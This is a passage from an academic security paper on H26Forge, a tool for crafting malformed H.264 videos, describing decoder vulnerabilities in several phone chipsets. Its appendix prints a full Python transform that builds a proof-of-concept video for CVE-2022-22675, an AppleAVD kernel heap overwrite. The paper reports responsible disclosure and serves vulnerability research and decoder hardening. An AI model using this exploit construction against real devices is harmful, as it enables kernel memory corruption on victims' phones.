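def first_mb_in_bounds(first_mb_in_slice: int, total_mbs: int) -> bool:
    """A slice must start at a macroblock address inside the frame."""
    return 0 <= first_mb_in_slice < total_mbs


def skip_run_in_bounds(current_mb: int, mb_skip_run: int, total_mbs: int) -> bool:
    """Skipping mb_skip_run macroblocks from current_mb must stay in the frame."""
    return mb_skip_run >= 0 and current_mb + mb_skip_run <= total_mbs
```

Under these assumptions a 1280 × 720 frame holds 80 × 45 = 3600 macroblocks, so a first_mb_in_slice of 3600, or an mb_skip_run that runs past address 3600, would be rejected.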
Figure 6 panels: (a) Target; (b)-(d) PV at 4 × 4, 8 × 8, and 16 × 16; (e)-(g) SV at 4 × 4, 8 × 8, and 16 × 16; (h)-(j) PH at 4 × 4, 8 × 8, and 16 × 16; (k)-(m) SH at 4 × 4, 8 × 8, and 16 × 16.

Figure 6: LCT results on the VANKYO S21 with a UNISOC VSP. The target video is the opening frame of Big Buck Bunny [42]. 8 × 8 Intra prediction goes through an extra deblocking process, regardless of settings. Parallel vertical (PV) LCT takes the bottom-most pixels of the target video, and parallel horizontal (PH) LCT takes the right-most pixels from the bottom-right-most macroblock. We were not able to derive a pattern from the recovered uninitialized data in sequential vertical (SV) and sequential horizontal (SH) LCT.

Kirin SoC D5500. In Kirin SoC devices with the D5500 decoder, we found that we can traverse the decoder stream buffer heap virtual memory by controlling the frame size in the SPS along with the first_mb_in_slice. By adjusting these syntax elements with a video transform, we could trigger MMU page faults that the kernel would log in the stream buffer heap address range. Per the source code,21 the stream buffer heap contains structures to decode the video, such as firmware contexts, SPSes, and PPSes, and is managed by the device, so it may contain device-corruptible data.

21 Online: https://github.com/Honor8Dev/android_kernel_huawei_FRD-L04/blob/master/drivers/vcodec/imagination/D5500_DRM/decoder/vdec/kernel_device/libraries/vdecdd/code/vdecdd_mmu.c.

We were limited in our ability to determine what the exact read or write operations were doing because the D5500 firmware runs on Imagination Technologies’ custom DSP architecture called MTX [21], for which we were not able to find adequate tooling.

Redmi Note 8 Pro MediaTek VPU. A video with an mb_skip_run larger than the frame size leads to a denial-of-service vulnerability on the MediaTek VPU located in the Redmi Note 8 Pro. The MediaTek Security Team reported that they were able to reproduce this issue in Android 9 and 10, but were unable to do so in Android 11 or later.

The MediaTek Helio G90T SoC implements a security feature called Device Access Permission Control driver (devapc). Devapc enforces device-defined access controls using TrustZone, and triggers a violation interrupt on unauthorized accesses. Attempting to decode a video with an out-of-bounds mb_skip_run triggers a devapc violation and causes the device to reboot. The reboot happens because the application processor attempts to access video decoder memory at an out-of-bounds address, and devapc calls BUG() after logging the violation.22 The crash does not happen every time, so we suspect it is a race condition in the MediaTek video decoder driver. Although other MediaTek VPUs logged violations, they did not cause reboots.

22 Online: https://github.com/MiCode/Xiaomi_Kernel_OpenSource/blob/begonia-r-oss/drivers/misc/mediatek/devapc/devapc-mtk-common.c#L333.

6.3.4 Kirin SoC D5500 heap overflow

We found a heap overflow in Kirin SoCs running the D5500 video decoder, which includes the Honor 8 and the MediaPad M5 Lite. The video uses the FMO feature of H.264; Kirin SoCs were among the few to support this feature. This vulnerability is available from thumbnailing, so an attacker just has to send a video to a victim. This vulnerability does not lend itself to more than a denial-of-service as kernel guard pages prevent neighboring heap allocations from being impacted.

FMO allows a frame to be split into up to eight slice groups, so that if any part is lost in transit the image can still be partially reconstructed. FMO is signaled in the PPS by denoting the number of slice groups to use as well as their organization within a frame. Because each macroblock in the frame can be in one of eight slice groups, the decoder maintains a map of macroblock address to slice group called the Slice Group Map (SGM). The D5500 decoder allocates a hardware SGM of size 3600 bytes and enforces this limit by only allowing videos of width 1280 pixels to have FMO support. But because the height component is not checked, it is possible to create an SGM larger than 3600 bytes, causing a heap overflow. The user-side library allocates an SGM that is as large as the frame and passes it to the driver. When the driver attempts to copy the user SGM buffer to the hardware, it writes past the allocated space and triggers a kernel panic due to a guard page access. Though there is an assert in the code to
prevent an overflow, it is not blocking and merely prints an assert failure.

We use H26Forge to generate videos that use FMO with a fixed width of 1280 and increasing height to determine the bounds of our overflow. Though H26Forge cannot decode FMO videos, it can generate videos that use it.

6.3.5 CedarV uninitialized memory leak

On the Pine A64 with the CedarV video decoder, we discovered a new way to exploit the Android ION vulnerability found in [47], which allows for kernel information leakage. We leak out uninitialized memory by creating a video with H26Forge whose first slice NALU is an IDR B slice. The IDR NALU leads CedarV to create an ION allocation for a frame, but the B slice type causes an error, so CedarV returns the uninitialized ION memory. The issue only arises when CedarV manages the frame allocation; the Android OS handles frame management when the output is to a Surface, preventing an information leak.

We defer to Section 6.4 of [47] to describe the exploitation of this vulnerability.

7 Related Work

We are not familiar with any existing tool that can programmatically modify the syntax elements of an H.264 encoded video. The current swiss-army knife of the video world, FFmpeg,23 can decode and encode common H.264 videos, but errors out on spec-non-compliant videos and does not support many H.264 features. The H.264 reference decoder,24 which is the ground truth for the H.264 spec, does not keep the syntax elements in memory as it focuses on producing an output image. Even tools for debugging video files, such as Elecard’s StreamEye,25 are used to visually inspect videos to adjust a video encoder rather than edit syntax elements.

23 Online: https://www.ffmpeg.org/.
24 Online: https://vcgit.hhi.fraunhofer.de/jvet/JM.
25 Online: https://www.elecard.com/products/video-analysis/streameye.

Several exploitable vulnerabilities in video decoders have previously been demonstrated. Gong and Pi [16] describe an exploitable vulnerability in the Venus firmware found in Qualcomm Snapdragon SoCs. Donenfeld [13] found a kernel overwrite vulnerability in the AppleD5500.kext for iOS 10. Tarakanov and Labunets [45] found an out-of-bounds write vulnerability in AppleAVD.kext and discuss its internals. They also discuss CVE-2022-22675, but do not provide details on how to extend the initial overflow.

Format-aware fuzzers such as QuickFuzz [17] and its derivatives [37, 44] can generate test inputs based on a grammar, but they cannot produce the entropy-encoded values needed for H.264. For example, FormatFuzzer [15] opts to replace compressed data in certain file formats with random bytes that can “be successfully decompressed with high probability.” FuzzGen [22] generates fuzzers for libraries by reviewing their real-world usage and produces LLVM libFuzzer stubs. The FuzzGen authors evaluated FuzzGen on Android codec libraries and found 17 vulnerabilities in H.265 and H.264 codec handling. Synopsys Defensics is an industry fuzzer that provides an H.264 test suite,26 but they describe slice data testing via mutation fuzzing. It is unclear if it can generate syntax-compliant encoded H.264 videos. None of these fuzzers focus on video generation at the syntax level; they also ignore CAVLC and CABAC encoded elements.

26 Online: https://www.synopsys.com/software-integrity/security-testing/fuzz-testing/defensics/protocols/h264-file.html.

The security of hardware accelerators is a focus of much recent work. Olson, Sethumadhavan, and Hill [36] systematize the threats posed to users by insecure third-party accelerators. Exemplifying these risks, much academic and industry research examines third-party accelerators, such as neural processing units [7, 32, 39], digital signal processors [28, 29], graphics processing units [19], wireless coprocessors [8, 9, 12, 20], security coprocessors [31, 46], and, as described above, hardware video decoders [13, 16, 45].

8 Conclusion

We have described H26Forge, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files. Using H26Forge, we have discovered (and responsibly disclosed) multiple memory corruption vulnerabilities in video decoding stacks from multiple vendors.

We draw two conclusions from our experience with H26Forge.

First, domain-specific tools are useful and necessary for improving video decoder security. Generic fuzzing tools have been used with great success to improve the quality of other kinds of media-parsing libraries, but that success has evidently not translated to video decoding.

The bugs we found and described in Section 5 have been present in iOS for a long time. We have tested that our proof-of-concept videos induce kernel panics on devices running iOS 13.3 (released December 2019) and iOS 15.6 (released July 2022). Binary analysis suggests that the first bug we identified was present in the kernel as far back as iOS 10, the first release whose kernel binary was distributed unencrypted.

We make H26Forge available at https://github.com/h26forge/h26forge under an open source license. We hope that it will facilitate followup work, both by academic researchers and by the vendors themselves, to improve the software quality of video decoders.

Second, the video decoder ecosystem is more insecure than previously realized. Platform vendors should urgently con-
sider designs that deprivilege software and hardware components that process untrusted video input.

Browser vendors have worked to sandbox media decoding libraries (see, e.g., Narayan et al. [34]); so have messaging app vendors, with the iMessage BlastDoor process being a notable example [18]. Mobile OS vendors have also worked to sandbox system media servers.27 These efforts are undermined by parsing video formats in kernel drivers.

Our reading of reverse-engineered kernel drivers suggests that current hardware relies on software to parse parameter sets and populate a context structure used by the hardware in macroblock decoding. It is not clear that it is safe to invoke hardware decoding with a maliciously constructed context structure, which suggests that whatever software component is charged with parsing parameter sets and populating the hardware context will need to be trusted, whether it is in the kernel or not. It may be worthwhile to rewrite this software component in a memory-safe language, such as the cros-codecs 28 effort, or to apply formal verification techniques to it.

An orthogonal direction for progress, albeit one that will require the support of media IP vendors, would redesign the software–hardware interface to simplify it. The Linux push for stateless hardware video decoders [14] is a step in this direction. Similarly, encoders that produce outputs that are software-decoder friendly, such as some AV1 encoders [27], help reduce the expected complexity of video decoders.

27 See, e.g., https://source.android.com/docs/core/media/framework-hardening.
28 Online: https://chromium.googlesource.com/crosvm/crosvm/+/refs/heads/main/media/cros-codecs/.

Acknowledgements

We would first like to acknowledge Øystein Sigholt and Jiaming Hu, whose 2018 CSE 227 browser fingerprinting project was the first to encounter the Luma Chroma Thief effect and inspired the tooling effort described in this paper. We would also like to thank Alex Gantman, David Kohlbrenner, and Stefan Savage for conversations about this work, and Hang Zhang and Zhiyun Qian for discussing their ION allocator work with us. This work was partly supported by a grant from Cisco and a research gift from Qualcomm.

References

[1] Paul Adenot and Bernard Aboba. WebCodecs. Working Draft. Online: https://www.w3.org/TR/webcodecs/. W3C, Feb. 2023.
[2] “About the security content of iOS 16.1 and iPadOS 16.” Online: https://support.apple.com/en-us/HT213489. Oct. 2022.
[3] “About the security content of iOS 15.7.1 and iPadOS 15.7.1.” Online: https://support.apple.com/en-us/HT213490. Oct. 2022.
[4] “About the security content of iOS 15.7.2 and iPadOS 15.7.2.” Online: https://support.apple.com/en-us/HT213531. Dec. 2022.
[5] “About the security content of iOS 16.2 and iPadOS 16.2.” Online: https://support.apple.com/en-us/HT213530. Dec. 2022.
[6] Apple Platform Security. Online: https://help.apple.com/pdf/security/en_US/apple-platform-security-guide.pdf. Dec. 2022.
[7] Brandon Azad. “An iOS hacker tries Android.” Online: https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html. Dec. 2020.
[8] Ian Beer. “An iOS zero-click radio proximity exploit odyssey.” Online: https://googleprojectzero.blogspot.com/2020/12/an-ios-zero-click-radio-proximity.html. Dec. 2020.
[9] Gal Beniamini. “Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1).” Online: https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html. Apr. 2017.
[10] Mark Brand. “Stagefrightened?” Online: https://googleprojectzero.blogspot.com/2015/09/stagefrightened.html. Sept. 2015.
[11] “CERT Vulnerability Note VU#924951.” Online: https://www.kb.cert.org/vuls/id/924951. July 2015.
[12] Jiska Classen, Francesco Gringoli, Michael Hermann, and Matthias Hollick. “Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation.” In: Proceedings of IEEE Security and Privacy (“Oakland”) 2022 (May 2022), pp. 1229–45.
[13] Adam Donenfeld. “Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability.” In: Phrack 70 (Oct. 2021). Online: http://phrack.org/issues/70/8.html.
[14] Nicolas Dufresne. “Linux Stateless Video Decoder Support.” Presented at ELC 2020. Slides online: https://elinux.org/images/c/c7/2020-06_ELCNA_-_Nicolas_Dufresne.pdf. July 2020.
[15] Rafael Dutra, Rahul Gopinath, and Andreas Zeller. “FormatFuzzer: Effective Fuzzing of Binary File Formats.” arXiv preprint arXiv:2109.11277. Online: https://arxiv.org/abs/2109.11277. Sept. 2021.
[16] Xiling Gong and Peter Pi. “Bypassing the Maginot Line: Remotely Exploit the Hardware Decoder on Smartphone.” Presented at Black Hat 2019. Slides online: https://i.blackhat.com/USA-19/Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remotely-Exploit-The-Hardware-Decoder-On-Smartphone.pdf. Aug. 2019.
[17] Gustavo Grieco, Martín Ceresa, Agustín Mista, and Pablo Buiras. “QuickFuzz testing for fun and profit.” In: Journal of Systems and Software 134 (Dec. 2017), pp. 340–54.
[18] Samuel Groß. “A Look at iMessage in iOS 14.” Online: https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html. Jan. 2021.
[19] Ben Hawkes. “Attacking the Qualcomm Adreno GPU.” Online: https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html. Sept. 2020.
[20] Grant Hernandez, Marius Muench, Dominik Maier, Alyssa Milburn, Shinjo Park, Tobias Scharnowski, Tyler Tucker, Patrick Traynor, and Kevin R. B. Butler. “FirmWire: Transparent Dynamic Analysis for Cellular Baseband Firmware.” In: Proceedings of NDSS 2022. Feb. 2022.
[21] Imagination Technologies. “Metagence Multi-threaded Processor IP Cores.” Archived: https://web.archive.org/web/20060813152939/http://www.imgtec.com/metagence/products/. 2006.
[22] Kyriakos Ispoglou, Daniel Austin, Vishwath Mohan, and Mathias Payer. “FuzzGen: Automatic Fuzzer Generation.” In: Proceedings of USENIX Security 2020. Aug. 2020, pp. 2271–87.
[23] H.264: Advanced video coding for generic audiovisual services. Standard. Online: https://www.itu.int/rec/T-REC-H.264-202108-I/en. ITU-T, Aug. 2021.
[24] Conformance specification for ITU-T H.264 advanced video coding. Standard. Online: https://www.itu.int/rec/T-REC-H.264.1-201602-I/en. ITU-T, Aug. 2021.
[25] Pierre Laperdrix, Nataliia Bielova, Benoit Baudry, and Gildas Avoine. “Browser Fingerprinting: A Survey.” In: ACM Transactions on the Web 14.2 (Apr. 2020).
[26] Kevin Lee, Vijay Rao, and William Arnold. “Accelerating Facebook’s infrastructure with application-specific hardware.” Online: https://engineering.fb.com/2019/03/14/data-center-engineering/accelerating-infrastructure/. Mar. 2019.
[27] Ryan Lei, Haixia Shi, Haoteng Chen, Ali Monfared, and Cheng Shi. “How Meta brought AV1 to Reels.” Online: https://engineering.fb.com/2023/02/21/video-engineering/av1-codec-facebook-instagram-reels/. Feb. 2023.
[28] Slava Makkaveev. “Looking for vulnerabilities in MediaTek audio DSP.” Online: https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp/. Nov. 2021.
[29] Slava Makkaveev. “Pwn2Own Qualcomm DSP.” Online: https://research.checkpoint.com/2021/pwn2own-qualcomm-dsp/. May 2021.
[30] Detlev Marpe, Thomas Wiegand, and Stephen Gordon. “H.264/MPEG4-AVC Fidelity Range Extensions: Tools, Profiles, Performance, and Application Areas.” In: Proceedings of ICIP 2005, Volume I. Sept. 2005, pp. 593–96.
[31] Damiano Melotti, Maxime Rossi-Bellom, and Andrea Continella. “Reversing and Fuzzing the Google Titan M Chip.” In: Proceedings of ROOTS 2021. Nov. 2021, pp. 1–10.
[32] Man Yue Mo. “Fall of the Machines: Exploiting the Qualcomm NPU (Neural Processing Unit) Kernel Driver.” Online: https://securitylab.github.com/research/qualcomm_npu/. Nov. 2021.
[33] “Mozilla Foundation Security Advisory 2022-40.” Online: https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/. Sept. 2022.
[34] Shravan Narayan, Craig Disselkoen, Tal Garfinkel, Nathan Froyd, Eric Rahm, Sorin Lerner, Hovav Shacham, and Deian Stefan. “Retrofitting Fine Grain Isolation in the Firefox Renderer.” In: Proceedings of USENIX Security 2020. Aug. 2020, pp. 699–716.
[35] Hikaru Nishida, Suleiman Souhlal, and Sangwhan Moon. “Making Android Runtime on Chrome OS More Secure and Easier to Upgrade with ARCVM.” Online: https://chromeos.dev/en/posts/making-android-more-secure-with-arcvm. Mar. 2022.
[36] Lena E. Olson, Simha Sethumadhavan, and Mark D. Hill. “Security Implications of Third-Party Accelerators.” In: IEEE Computer Architecture Letters 15.1 (Jan. 2016), pp. 50–53.
[37] Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. “Semantic Fuzzing with Zest.” In: Proceedings of ISSTA 2019. July 2019, pp. 329–40.
[38] Gwendal Patat, Mohamed Sabt, and Pierre-Alain Fouque. “Exploring Widevine for Fun and Profit.” In: Proceedings of WOOT 2022. May 2022, pp. 277–88.
[39] Maxime Peterlin. “Reversing and Exploiting Samsung’s Neural Processing Unit.” Online: https://blog.impalabs.com/2103_reversing-samsung-npu.html. Mar. 2021.
[40] Parthasarathy Ranganathan, Daniel Stodolsky, Jeff Calow, Jeremy Dorfman, Marisabel Guevara, Clinton Wills Smullen IV, et al. “Warehouse-Scale Video Acceleration: Co-Design and Deployment in the Wild.” In: Proceedings of ASPLOS 2021. Apr. 2021, pp. 600–15.
[41] Iain E. Richardson. The H.264 Advanced Video Compression Standard. Second edition. Wiley, 2010.
[42] Ton Roosendaal. “Big Buck Bunny.” In: ACM SIGGRAPH ASIA 2008 Computer Animation Festival. Dec. 2008, p. 62.
[43] Natalie Silvanovich. “CVE-2022-22675: AppleAVD Overflow in AVC_RBSP::parseHRD.” Online: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-22675.html. May 2022.
[44] Prashast Srivastava and Mathias Payer. “Gramatron: Effective Grammar-Aware Fuzzing.” In: Proceedings of ISSTA 2021. July 2021, pp. 244–56.
[45] Nikita Tarakanov and Andrey Labunets. “Cinema time!” Presented at Hexacon 2022. Slides online: https://github.com/isciurus/hexacon2022_AppleAVD/blob/main/hexacon2022_AppleAVD.pdf. Oct. 2022.
[46] David Wang, Mathew Solnik, and Tarjei Mandt. “Demystifying the Secure Enclave Processor.” Presented at Black Hat 2016. Slides online: https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf. Aug. 2016.
[47] Hang Zhang, Dongdong She, and Zhiyun Qian. “Android ION Hazard: The Curse of Customizable Memory Management System.” In: Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 2016, pp. 1663–1674.

A More details on CVE-2022-22675

This section provides more details on how we controlled the second overflow in our proof-of-concept video for CVE-2022-22675. Listing 2 shows the final transform.

We enable a second overflow in parsePredWeightTable by overwriting num_ref_idx_l0_active_minus1 with CVE-2022-22675. The function parsePredWeightTable loops from 0 to num_ref_idx_l0_active_minus1, checking a luma or chroma flag at each iteration to determine whether to parse the syntax elements luma_weight, luma_offset, chroma_weight, and chroma_offset when the respective flag is set. The H.264 User Context maintains eight lists of type uint16: for both reference lists, it has arrays of length 16 for luma_weight and luma_offset, and arrays of length 32 for chroma_weight and chroma_offset. For each syntax element, AppleAVD.kext will exp-Golomb decode it, store the recovered value in the H.264 User Context, and then check to see if it is in the range [0, 255].

We found that in parsePredWeightTable, the overwritten 8-bit num_ref_idx_l0_active_minus1 is sign-extended to 32 bits. This means that setting it to a value larger than 127 leads to a uint32 loop bound of at least 4,294,967,040! If the encoded bitstream is exhausted without failure, then the bitstream reader will return a bit string of all 1s, which exp-Golomb decodes to 0. This is within the bounds for each syntax element, and thus the loop will continue until the entire kernel heap is overflowed, triggering a kernel panic. Alternatively, if the decoder encounters a luma/chroma weight or offset outside the expected bounds, it first stores the out-of-bounds weight or offset as normal and then it exits the loop, emits an error message, and continues to the next NALU.
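The two arithmetic facts this paragraph relies on can be checked with a short sketch. The helper names below are hypothetical and the code models only the arithmetic, not AppleAVD.kext itself: sign_extend_8_to_32 reinterprets a byte as a signed 8-bit value widened to 32 bits and then read as unsigned, and decode_ue decodes a single unsigned exp-Golomb codeword from a string of bits.

```python
def sign_extend_8_to_32(value: int) -> int:
    """Read a byte as a signed 8-bit value, widen it, and return it as a uint32."""
    value &= 0xFF
    if value & 0x80:           # top bit set: negative when read as int8
        value -= 0x100
    return value & 0xFFFFFFFF  # reinterpret the widened value as unsigned


def decode_ue(bits: str) -> int:
    """Decode one unsigned exp-Golomb codeword from a string of '0'/'1' bits.

    Assumes the string contains the terminating '1' and enough suffix bits.
    """
    leading_zeros = 0
    while bits[leading_zeros] == "0":
        leading_zeros += 1
    # After the leading zeros comes a '1', followed by leading_zeros suffix bits.
    suffix = bits[leading_zeros + 1 : 2 * leading_zeros + 1]
    return (1 << leading_zeros) - 1 + (int(suffix, 2) if suffix else 0)
```

For instance, sign_extend_8_to_32(0x80) yields 4,294,967,168 (0xFFFFFF80), which is above the 4,294,967,040 bound quoted above, and decode_ue applied to a run of 1 bits yields 0 because a codeword with no leading zeros encodes codeNum 0, which maps to 0 in both the unsigned and signed exp-Golomb forms.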
Therefore, to escape the 32-bit sign-extended loop, we encode a weight or offset element Bn in the range [256, 65535] at the point we would like to target. To do so, we need to enable the luma and chroma flags and fill in the corresponding luma_weight, luma_offset, chroma_weight, and chroma_offset entries. The flags are decoded and checked on each loop iteration, so we include an encoding of the flags in the generated bitstream. When the flags are set to true, we can write values in the range [0, 255] without exiting early. When they are set to false, AppleAVD.kext writes a default value at those locations. Either way, intermediate memory up to our target is modified. Because the flags must be checked on each iteration, the slice header size is proportional to the target offset. In all, writing an arbitrary sequence of 16-bit values to memory requires n slices for n larger-than-255 values, with smaller values written by enabling intermediate flags.

When using multiple slices for multiple writes, each slice must be within an IDR NALU, as the out-of-bounds luma/chroma offset/weight is treated as a decoding error, and the decoder uses IDR NALUs for recovery. We adjust the slices using the same technique we used for the infinite loop bug discussed in Section 5.1.

Listing 2: CVE-2022-22675 video transform.

def cve_2022_22675(ds, message):
    from helpers import new_vui_parameter, new_hrd_parameter, clone_and_append_existing_slice
    import math

    # This is the offset from the start of the context
    # - Object size is 0x8642b0
    # - Allocated size is 0x868000
    offset = 0x868000
    # Keep this even with no short in the range [0x0000, 0x007f]
    message_hex = "deadbeef41414141"

    message_snippets = [int(message_hex[i:i+4], 16) for i in range(0, len(message_hex), 4)][::-1]

    print("\t Writing '0x{}' at furthest offset location 0x{:x}".format(message_hex, offset))

    #####
    # Step 1. Use parseHRD overwrite to change the default num_ref_idx value
    #####

    # We need this flag enabled to go into second overwrite
    ds["ppses"][0]["weighted_pred_flag"] = True

    # Prepare our overwriting SPS
    sps_idx = 1  # We target the 2nd SPS
    cpb_cnt_minus1 = 68  # This value is limited to 255; we set it to 68 for targeting
    ref_idx_overwrite_idx = 68  # First index where we overwrite the num_ref_idx_l0_default_active_minus1
    num_ref_idx_payload = 0xff

    ds["spses"][sps_idx]["seq_parameter_set_id"] = 31
    ds["spses"][sps_idx]["vui_parameters_present_flag"] = True
    ds["spses"][sps_idx]["vui_parameters"] = new_vui_parameter()

    # To maximize our overwrite, we focus on VCL HRD parameters, given it is closest to the end of the object
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters_present_flag"] = True
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"] = new_hrd_parameter()
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cpb_cnt_minus1"] = cpb_cnt_minus1
    # Fill up with junk and we will write over what values matter
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["bit_rate_value_minus1"] = [i for i in range(cpb_cnt_minus1+1)]
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cpb_size_values_minus1"] = [i+cpb_cnt_minus1+1 for i in range(cpb_cnt_minus1+1)]
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cbr_flag"] = [False] * (cpb_cnt_minus1+1)
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cbr_flag"][ref_idx_overwrite_idx-5] = True  # PPS Entropy encoding
    pps_tgt_payload0 = num_ref_idx_payload << 16  # bottom byte is num_ref_idx_l0_default_active_minus1
    pps_tgt_payload0 |= num_ref_idx_payload << 8  # top byte is num_ref_idx_l1_default_active_minus1
    pps_tgt_payload0 |= int(ds["ppses"][0]["weighted_pred_flag"]) << 24  # value is a byte
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cpb_size_values_minus1"][ref_idx_overwrite_idx] = pps_tgt_payload0

    #####
    # Step 2. Prepare for our second overwrite in pred_weight_table decoding
    #####

    # Set all slices to IDR slices to avoid "missing Keyframe" error
    for i in range(len(ds["nalu_headers"])):
        if ds["nalu_headers"][i]["nal_unit_type"] == 1:
            ds["nalu_headers"][i]["nal_unit_type"] = 5

    print("\t Need {} P slices to write the message 0x{}".format(len(message_snippets), message_hex))

    nalu_idx = 4  # Our video is SPS, PPS, SPS, I, P so we copy index 4
    slice_idx = 1  # We want the P slice to be copied
    while len(ds["slices"]) <= len(message_snippets):
        ds = clone_and_append_existing_slice(ds, nalu_idx, slice_idx)

    #####
    # Step 3. Modify relevant slices to write our target message
    #####
    for i in range(1, len(ds["slices"])):
        ds["slices"][i]["sh"]["num_ref_idx_active_override_flag"] = False
        avcusercontext_offset = offset  # This will write right next to our previous write
        offset_from_slice = avcusercontext_offset - 0x374d4  # this constant is the start of the Slice offset
        # Floor division (//) keeps these counts integral so they can be used as list lengths and indices
        chroma_offset_overwrite_num = (offset_from_slice - 0x206) // 4  # 0x206 is the offset from the start of the slice
        slice_num_ref_idx_payload = chroma_offset_overwrite_num + (1 - i) // 2 + int(math.ceil(len(message_hex) / 8.0))

        # If we have an odd number of 'short' types we want to write,
        # and if we're writing the lower end of bytes, we need to
        # slightly recalibrate where we write
        if len(ds["slices"]) % 2 == 0 and i % 2 == 0:
            slice_num_ref_idx_payload -= 1
        ds["slices"][i]["sh"]["num_ref_idx_l0_active_minus1"] = slice_num_ref_idx_payload
        ds["slices"][i]["sh"]["luma_log2_weight_denom"] = 0  # 1 << X is stored
        ds["slices"][i]["sh"]["chroma_log2_weight_denom"] = 0  # 1 << X is stored
        ds["slices"][i]["sh"]["luma_weight_l0_flag"] = [False] * (slice_num_ref_idx_payload+1)

        # on the device, this is shifted by the sps.bit_depth_luma_value_minus8
        ds["slices"][i]["sh"]["luma_weight_l0"] = [0] * (slice_num_ref_idx_payload+1)
        ds["slices"][i]["sh"]["luma_offset_l0"] = [0] * (slice_num_ref_idx_payload+1)
        ds["slices"][i]["sh"]["chroma_weight_l0_flag"] = [False] * (slice_num_ref_idx_payload+1)

        # on the device, this is shifted by the sps.bit_depth_chroma_value_minus8
        ds["slices"][i]["sh"]["chroma_weight_l0"] = [[0, 0]] * (slice_num_ref_idx_payload+1)
        ds["slices"][i]["sh"]["chroma_offset_l0"] = [[0, 0]] * (slice_num_ref_idx_payload+1)

        # The location we're overwriting
        ds["slices"][i]["sh"]["chroma_weight_l0_flag"][slice_num_ref_idx_payload] = True
        ds["slices"][i]["sh"]["chroma_weight_l0"][slice_num_ref_idx_payload] = [0x64+i, 0x65+i]

        # Our target overwrite location
        if len(ds["slices"]) % 2 == 1:  # We are writing an even number of shorts
            if i % 2 == 1:
                ds["slices"][i]["sh"]["chroma_offset_l0"][slice_num_ref_idx_payload] = [message_snippets[i], 0x20]
            else:
                ds["slices"][i]["sh"]["chroma_offset_l0"][slice_num_ref_idx_payload] = [0x21, message_snippets[i-2]]
        else:  # odd number of short values
            if i % 2 == 0:
                ds["slices"][i]["sh"]["chroma_offset_l0"][slice_num_ref_idx_payload] = [0x20, message_snippets[i-1]]
            else:
                ds["slices"][i]["sh"]["chroma_offset_l0"][slice_num_ref_idx_payload] = [message_snippets[i-1], 0x21]
    return ds
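The store-then-exit behavior described in the text can be illustrated with a toy model. The sketch below is not AppleAVD.kext's logic: the function names, the dictionary standing in for memory, and the [0, 255] in-bounds range (taken from the prose above) are all assumptions made for illustration. It models a loop that stores every decoded entry and stops only after storing one that is out of bounds, and it counts how many slices a message needs under the rule of one slice per larger-than-255 value.

```python
def simulate_weight_loop(entries, memory, base, lo=0, hi=255):
    """Toy model of the weight/offset loop.

    Each entry is stored at base + k first and checked afterwards, so the
    out-of-bounds value that ends the loop is itself written to memory.
    Returns the index at which the loop exited, or None if it never did.
    """
    for k, value in enumerate(entries):
        memory[base + k] = value & 0xFFFF  # stored "as normal"
        if not (lo <= value <= hi):
            return k  # error path: stop decoding this slice header
    return None


def slices_needed(values):
    """One slice per value above 255; smaller values fit alongside via intermediate flags."""
    return sum(1 for v in values if v > 0xFF)


if __name__ == "__main__":
    memory = {}
    exit_index = simulate_weight_loop([1, 2, 0xBEEF, 7], memory, base=100)
    print(exit_index, memory)
    # Same 16-bit chunks as message_hex = "deadbeef41414141" in Listing 2
    print(slices_needed([0xDEAD, 0xBEEF, 0x4141, 0x4141]))
```

In this model the entry after the out-of-bounds value is never stored, which is why each large value needs its own slice. The count for the example message agrees with the number of P slices that Listing 2 reports via len(message_snippets).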
